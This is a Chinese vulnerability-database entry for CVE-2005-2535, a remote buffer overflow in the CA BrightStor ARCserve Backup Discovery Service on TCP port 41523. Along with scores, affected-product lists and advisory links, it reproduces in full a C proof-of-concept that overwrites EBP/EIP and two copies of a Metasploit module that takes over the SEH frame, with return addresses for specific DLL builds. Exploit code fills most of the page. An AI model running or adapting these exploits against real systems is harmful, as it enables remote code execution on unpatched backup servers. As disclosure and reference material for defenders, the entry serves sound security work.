CVE-2005-2535
CVSS7.5
发布时间 :2005-08-10 00:00:00
修订时间 :2008-09-05 16:52:01
NMCOEP    

[原文]Buffer overflow in the Discovery Service in BrightStor ARCserve Backup 9.0 through 11.1 allows remote attackers to execute arbitrary commands via a large packet to TCP port 41523, a different vulnerability than CVE-2005-0260.


[CNNVD]CA BrightStor ARCserve/Enterprise 缓冲区溢出漏洞(CNNVD-200508-098)

        Computer Associates BrightStor ARCserve/Enterprise是多平台下的备份和恢复保护系统。
        Computer Associates BrightStor ARCserve Backup发现服务存在一个缓冲区溢出,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。ARCserve Backup软件在处理请求时盲目地拷贝来自网络上的数据,远程攻击者可以通过发送超长的数据导致缓冲区溢出。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ca:brightstor_arcserve_backup:11.1::windows
cpe:/a:ca:brightstor_enterprise_backup:10.5::aix
cpe:/a:ca:brightstor_arcserve_backup:11.1::aix
cpe:/a:ca:brightstor_arcserve_backup:7.0::linux
cpe:/a:ca:brightstor_enterprise_backup:10.0Computer Associates BrightStor Enterprise Backup 10.0
cpe:/a:ca:brightstor_enterprise_backup:10.0::aix
cpe:/a:ca:brightstor_arcserve_backup:11.1::solaris
cpe:/a:ca:brightstor_arcserve_backup:9.0.1::windows
cpe:/a:ca:brightstor_arcserve_backup:11.1::netware
cpe:/a:ca:brightstor_arcserve_backup:11.0::windows
cpe:/a:ca:brightstor_arcserve_backup_hp:11.1::hp
cpe:/a:ca:brightstor_arcserve_backup:9.0::linux:jp
cpe:/a:ca:brightstor_enterprise_backup:10.5::windows
cpe:/a:ca:brightstor_enterprise_backup:10.5::hp
cpe:/a:ca:brightstor_arcserve_backup:11.1::tru64
cpe:/a:ca:brightstor_enterprise_backup:10.5::tru64
cpe:/a:ca:brightstor_enterprise_backup:10::solaris
cpe:/a:ca:arcserve_backup_2000:::windows:jp
cpe:/a:ca:brightstor_arcserve_backup:9.0::netware
cpe:/a:ca:brightstor_enterprise_backup:10.0::mainframe_linux
cpe:/a:ca:brightstor_arcserve_backup:9.0::linux
cpe:/a:ca:brightstor_enterprise_backup:10.5Computer Associates BrightStor Enterprise Backup 10.5
cpe:/a:ca:brightstor_arcserve_backup:11.1::macintosh
cpe:/a:ca:brightstor_enterprise_backup:10.5::solaris
cpe:/a:ca:brightstor_arcserve_backup:11.1::linux
cpe:/a:ca:brightstor_enterprise_backup:10.0::hpux

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2535
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2535
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-098
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/966880
(PATCH)  CERT-VN  VU#966880
http://xforce.iss.net/xforce/xfdb/19320
(PATCH)  XF  brightstor-discovery-servicepc-bo(19320)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478
(PATCH)  CONFIRM  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478
http://www.securityfocus.com/bid/12536
(PATCH)  BID  12536
http://secunia.com/advisories/14293
(VENDOR_ADVISORY)  SECUNIA  14293
http://www.osvdb.org/13814
(UNKNOWN)  OSVDB  13814
http://archives.neohapsis.com/archives/bugtraq/2005-02/0201.html
(UNKNOWN)  BUGTRAQ  20050215 Re: BrightStor ARCserve Backup buffer overflow PoC
http://archives.neohapsis.com/archives/bugtraq/2005-02/0141.html
(UNKNOWN)  BUGTRAQ  20050211 Re: BrightStor ARCserve Backup buffer overflow PoC
http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html
(UNKNOWN)  BUGTRAQ  20050211 BrightStor ARCserve Backup buffer overflow PoC

- 漏洞信息

CA BrightStor ARCserve/Enterprise 缓冲区溢出漏洞
高危 缓冲区溢出
2005-08-10 00:00:00 2005-10-25 00:00:00
远程  
        Computer Associates BrightStor ARCserve/Enterprise是多平台下的备份和恢复保护系统。
        Computer Associates BrightStor ARCserve Backup发现服务存在一个缓冲区溢出,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。ARCserve Backup软件在处理请求时盲目地拷贝来自网络上的数据,远程攻击者可以通过发送超长的数据导致缓冲区溢出。
        

- 公告与补丁

        暂无数据

- 漏洞信息 (815)

CA BrightStor ARCserve Backup Remote Buffer Overlow PoC (EDBID:815)
linux dos
2005-02-12 Verified
0 cybertronic
N/A [点击下载]
/*
* BrightStor ARCserve Backup buffer overflow PoC
* cybertronic@gmx.net
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

#define PORT 41523

void
start ( int s )
{
        char buffer[4096];

        bzero ( &buffer, 4096 );
        memset ( buffer, 0x41, 50 );
        buffer[0] = 0x9b;
        buffer[1] = 0x53; //S
        buffer[2] = 0x45; //E
        buffer[3] = 0x52; //R
        buffer[4] = 0x56; //V
        buffer[5] = 0x49; //I
        buffer[6] = 0x43; //C
        buffer[7] = 0x45; //E
        buffer[8] = 0x50; //P
        buffer[9] = 0x43; //C
        buffer[17] = 0x18;
        buffer[21] = 0xc0;
        buffer[22] = 0xa8;
        buffer[23] = 0x02;
        buffer[24] = 0x67;
        buffer[25] = 0x53; //S
        buffer[26] = 0x45; //E
        buffer[27] = 0x52; //R
        buffer[28] = 0x56; //V
        buffer[29] = 0x49; //I
        buffer[30] = 0x43; //C
        buffer[31] = 0x45; //E
        buffer[32] = 0x50; //P
        buffer[33] = 0x43; //C
        buffer[41] = 0x01;
        buffer[43] = 0x0c;
        buffer[44] = 0x6c;
        buffer[45] = 0x93;
        buffer[46] = 0xce;
        buffer[47] = 0x18;
        buffer[48] = 0x18;
        //ebp
        buffer[49] = 0xbe;
        buffer[50] = 0xba;
        buffer[51] = 0xad;
        buffer[52] = 0xde;
        //eip
        buffer[53] = 0xde;
        buffer[54] = 0xc0;
        buffer[55] = 0xad;
        buffer[56] = 0xde;

        printf ( "[*] Sending buffer [ %d bytes ]...", strlen ( buffer ) );
        if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
        {
                printf ( RED "Send failed!\n" NORMAL );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );
        sleep ( 1 );
}

int
main ( int argc, char *argv[] )
{

        int s;
        struct hostent *he;
        struct sockaddr_in addr;

        if ( argc != 2 )
        {
                fprintf ( stderr,"Usage: %s hostname\n", argv[0] );
                exit ( 1 );
        }

        printf ( "Resolving hostname..." );
        if ( ( he = gethostbyname ( argv[1] ) ) == NULL )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( "OK!\n" );

        if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
        {
                exit ( 1 );
        }

        addr.sin_family = AF_INET;
        addr.sin_port = htons ( PORT );
        addr.sin_addr = *( ( struct in_addr * ) he->h_addr );

        printf ( "Connecting to %s...", argv[1] );
        if ( connect ( s, ( struct sockaddr * ) &addr, sizeof ( struct sockaddr ) ) == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( "OK!\n" );
        start ( s );
        close ( s );
        return ( 0 );
} 

// milw0rm.com [2005-02-12]
		

- 漏洞信息 (16408)

CA BrightStor Discovery Service TCP Overflow (EDBID:16408)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: discovery_tcp.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Discovery Service TCP Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Discovery Service. This vulnerability occurs when a specific
				type of request is sent to the TCP listener on port 41523.
				This vulnerability was discovered by cybertronic[at]gmx.net
				and affects all known versions of the BrightStor product.
				This module is based on the 'cabrightstor_disco' exploit by
				Thor Doomen.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-2535'],
					[ 'OSVDB', '13814'],
					[ 'BID', '12536'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
					[ 'URL', 'http://milw0rm.com/exploits/1131'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0
						{
							'Platform' => 'win',
							'Ret'      => 0x23803b20, # pop/pop/ret
							'Offset'   => 1032,
						},
					],
					[
						'cheyprod.dll 12/12/2003',
						{
							'Platform' => 'win',
							'Ret'      => 0x23805714, # pop/pop/ret
							'Offset'   => 1024,
						},
					],
					[
						'cheyprod.dll 07/21/2004',
						{
							'Platform' => 'win',
							'Ret'      => 0x23805d10, # pop/pop/ret
							'Offset'   => 1024,
						},
					],
				],
			'DisclosureDate' => 'Feb 14 2005',
			'DefaultTarget' => 1))

		register_options(
			[
				Opt::RPORT(41523)
			], self.class)
	end

	def check

		# The first request should have no reply
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => datastore['RPORT'],
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('META')
		x = csock.get_once(-1, 3)
		csock.close

		# The second request should be replied with the host name
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => datastore['RPORT'],
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('hMETA')
		y = csock.get_once(-1, 3)
		csock.close

		if (y and not x)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf = rand_text_english(4096)

		# Overwriting the return address works well, but the only register
		# pointing back to our code is 'esp'. The following stub overwrites
		# the SEH frame instead, making things a bit easier.

		seh = generate_seh_payload(target.ret)
		buf[target['Offset'], seh.length] = seh

		# Make sure the return address is invalid to trigger SEH
		buf[ 900, 100]     = (rand(127)+128).chr * 100

		# SERVICEPC is the client host name actually =P (thanks Juliano!)
		req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
		req << buf

		sock.put(req)
		sock.get_once

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83210)

CA BrightStor Discovery Service TCP Overflow (PacketStormID:F83210)
2009-11-26 00:00:00
H D Moore,patrick  metasploit.com
exploit,tcp
CVE-2005-2535
[点击下载]

This Metasploit module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic@gmx.net and affects all known versions of the BrightStor product. This Metasploit module is based on the 'cabrightstor_disco' exploit by Thor Doomen.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor Discovery Service TCP Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the CA BrightStor
				Discovery Service. This vulnerability occurs when a specific
				type of request is sent to the TCP listener on port 41523.
				This vulnerability was discovered by cybertronic[at]gmx.net
				and affects all known versions of the BrightStor product.
				This module is based on the 'cabrightstor_disco' exploit by
				Thor Doomen.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2535'],
					[ 'OSVDB', '13814'],
					[ 'BID', '12536'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
					[ 'URL', 'http://milw0rm.com/exploits/1131'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[
						'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0
						{
							'Platform' => 'win',
							'Ret'      => 0x23803b20, # pop/pop/ret
							'Offset'   => 1032, 
						},
					],
					[
						'cheyprod.dll 12/12/2003',
						{
							'Platform' => 'win',
							'Ret'      => 0x23805714, # pop/pop/ret
							'Offset'   => 1024,
						},
					],
					[
						'cheyprod.dll 07/21/2004',
						{
							'Platform' => 'win',
							'Ret'      => 0x23805d10, # pop/pop/ret
							'Offset'   => 1024,
						},
					],					
				],
			'DisclosureDate' => 'Feb 14 2005',
			'DefaultTarget' => 1))
			
			register_options(
				[
					Opt::RPORT(41523)
				], self.class)
	end

	def check

		# The first request should have no reply
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => datastore['RPORT'],
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})
				
		csock.put('META')
		x = csock.get_once(-1, 3)
		csock.close
		
		# The second request should be replied with the host name
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => datastore['RPORT'],
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})
				
		csock.put('hMETA')
		y = csock.get_once(-1, 3)
		csock.close
		
		if (y and not x)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe	
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf = rand_text_english(4096)

		# Overwriting the return address works well, but the only register
		# pointing back to our code is 'esp'. The following stub overwrites
		# the SEH frame instead, making things a bit easier.

		seh = generate_seh_payload(target.ret)
		buf[target['Offset'], seh.length] = seh

		# Make sure the return address is invalid to trigger SEH
		buf[ 900, 100]     = (rand(127)+128).chr * 100

		# SERVICEPC is the client host name actually =P (thanks Juliano!)	
		req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
		req << buf

		sock.put(req)
		sock.get_once

		handler
		disconnect
	end

end
    

- 漏洞信息

13814
CA BrightStor ARCserve Backup Discovery Service SERVICEPC Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Uncoordinated Disclosure

- 漏洞描述

A buffer overflow exists in ARCserve Backup. The Discovery Service fails to validate packets received on TCP port 41523 resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-02-12 Unknow
2005-02-12 2005-02-19

- 解决方案

Upgrade to version r11.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站